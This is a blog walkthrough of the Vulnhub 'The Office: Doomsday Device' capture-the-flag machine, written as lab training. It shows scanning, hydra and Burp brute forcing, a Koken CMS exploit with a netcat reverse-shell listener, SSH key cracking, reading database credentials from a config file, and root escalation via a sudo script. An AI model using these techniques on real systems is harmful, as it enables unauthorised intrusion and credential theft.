NepCodeX

Byte Musings: Where Tech Meets Curiosity


The Office: Doomsday Device Walkthrough

the office doomsday device walkthrough writeup vulnhub

The Office: Doomsday Device is a Vulnhub machine based on the US version of the British mockumentary “The Office”. There are 8 flags on the machine altogether that we need to find. “The Office: Doomsday Device Walkthrough”.

Link to the machine: https://www.vulnhub.com/entry/the-office-doomsday-device,627/

Funbox Walkthrough – Vulnhub – Writeup

Identify the target machine

Firstly, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24
image 205

Scan open ports

Next, I scanned open ports on the target machine so that I would get the knowledge of the exposed services.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.63
image 206

Here, we see three web services and one FTP service. Likewise, we also see a filtered port 22.

Enumerate port 80

The default page didn’t give me anything.

image 207

However, the source contained a base64 encoded text at the end of the page.

image 208
image 209

The decoded text gave us morse code which we can decode using Cyber Chef.

image 210

Here, we got the first flag.

Bruteforce directory

For the next flag, I enumerated the directory on port 80.

gobuster dir -u http://10.0.2.63 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir-80.log
image 211

I found a path that had a Wireshark packet capture file and a text file.

image 212
image 213

And, I also downloaded the capture file. From the note above, the one who smells like death refers to Creed. Similarly, it also says that he has a weak password. Upon opening the capture file, we see the FTP password of the user creed.

image 214

But it didn’t allow me to log in. Meanwhile, we get another path in the gobuster scan.

image 215
image 216

On that path, we see a document.

image 217

The document has the third flag (ours second). Also, the document says that Creed has added a three-digit number at the end of the password. So, I wrote a python script to create a wordlist.

with open("wordlist.txt", "w") as file:
    for i in range(1000):
        file.write(f"creed{i:03}\n")

After I ran the python script, I got a wordlist “wordlist.txt” as follows.

image 218

Then, I did the bruteforce once again.

hydra -l creed -P wordlist.txt 10.0.2.63 ftp
image 219
lftp -u creed,creed223 10.0.2.63
image 220

On the reminder file, we see a hint for the next step. Upon searching the internet for a reference with the same line, we redirect to season 7 episode 9. And, there is a reference to the password which I have snipped below.

image 221

So, the password of the zip is “bigboobz”.

image 222

The files had a note and an encrypted SSH private key.

image 223

Here, the note said that the private key belongs to angela and the passphrase is one of her cats’ names. I checked the names from the link below.

https://theoffice.fandom.com/wiki/Angela%27s_cats

However, we saw in the Nmap scan results that the SSH port is filtered. Therefore, we have to unlock the port. In most of the case, we see the use of the binary knock for this purpose.

Enumerate port 18888

On the website, we see a reference to angela once again. Next, I scanned the directories.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://10.0.2.63:18888/FUZZ" -of html -o dir-18888.html -fs 0
image 225

On the admin page, we see a login form as follows.

image 224

I fired up burp suite for bruteforcing the password. Since we know the email is “[email protected]”, and the password is one of her cats, we can use Burp Suite intruder. In the intruder, I set the position as follows.

image 226

And, I manually added the cats’ names from the fandom page.

image 227

Lastly, I started the attack.

image 228

The cat Crinklepuss redirected and the length is different from others. So, we got the password.

image 229

The settings of the Koken CMS revealed the version of it. This version suffers from the following exploit.

https://www.exploit-db.com/exploits/48706

I followed the instructions to get the reverse shell. I listened on port 9001.

nc -nlvp 9001
image 230
image 231
image 232
image 233

Finally, I got access to a shell.

image 234

Next, I improved the shell using the following link.

Upgrade to an intelligent reverse shell

Unlock the filtered port

On the /var/www/html directory, there is a hint directory.

image 235

Inside the directory, we have an index.html file.

image 236

It asked us to find the difference between the images. Thus, I downloaded the images to my machine.

wget http://10.0.2.63/_hint_/knockknock1.jpg
wget http://10.0.2.63/_hint_/knockknock2.jpg
wget http://10.0.2.63/_hint_/knockknock3.jpg

After I downloaded the images, I looked at the exiftags of all images. Luckily, I got something on the second image.

exiftool knockknock2.jpg
image 237

Using the numbers 5000, 7000 and 9000, we can unlock the ssh port.

knock 10.0.2.63 5000 7000 9000

After doing the above command, I ran Nmap scan on port 22.

nmap -v -T4 -sC -sV -p22 10.0.2.63
image 238

Getting SSH shell access

Previously, we had found an encrypted SSH private key named michael. So, we can guess that that belongs to the same user. Thus, I moved forward to cracking the passphrase of it. Also, I had downloaded ssh2john.py for python3 into the home directory of my machine.

python3 ~/ssh2john.py michael | tee michael-hash
image 239

Next, I cracked the hash using the file “rockyou.txt”.

john michael-hash --wordlist=/home/kali/rockyou.txt
image 240

It gave us the passphrase. So, I changed the permissions of the private key and logged into the SSH service.

chmod 600 michael
ssh [email protected] -i michael
image 241

The shell is a restricted bash. So, I overcame the restrictions as follows.

python3 -c 'import pty;pty.spawn("/bin/bash")'
image 242

We got the next flag on the directory.

image 243

Find unexplored flags

On the /var/www/html2/secret directory, we got one missed flag.

image 244

When I checked the sudo permissions, I found out that the user can execute some scripts as all users.

sudo -l
image 245

But before this, let’s get another flag that is situated in MySQL server.

cat /var/www/koken/storage/configuration/database.php
image 246

Using these configurations, we can log into the database server.

mysql -ukokenuser -p -D kokendb
image 247

That table contained our fifth flag. So, we got all of the first 7 flags. Since we only have one flag left, we can proceed towards root privilege escalation.

image 248

Coming back to the sudo permissions, we don’t see any files inside creed’s home directory starting with “defuse”.

image 249

However, we can log into the FTP server using creed’s credentials and try executing it as root. I created a file “defuse.sh” on my local machine with the following content.

#!/bin/bash
bash -i
image 250

However, I couldn’t make it executable. So, I checked the permissions on the configuration file /etc/vsftpd.conf.

image 251

Since it’s editable by everyone, we can enable the chmod command.

image 252

Now, we have to restart the service which we don’t have access to. Therefore, I had to restart the virtual machine. Next, I had to unlock the service once again. Similarly, I had to log in as michael and overcome the restricted bash.

And, I didn’t get any errors while changing the permissions in the FTP client.

image 253
image 254

Then, I executed the script as the user root.

sudo -u root /home/creed/defuse.sh
image 255

Finally, I got the last flag.

image 256


0 0 votes
Article Rating
Subscribe
Notify of
guest
3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments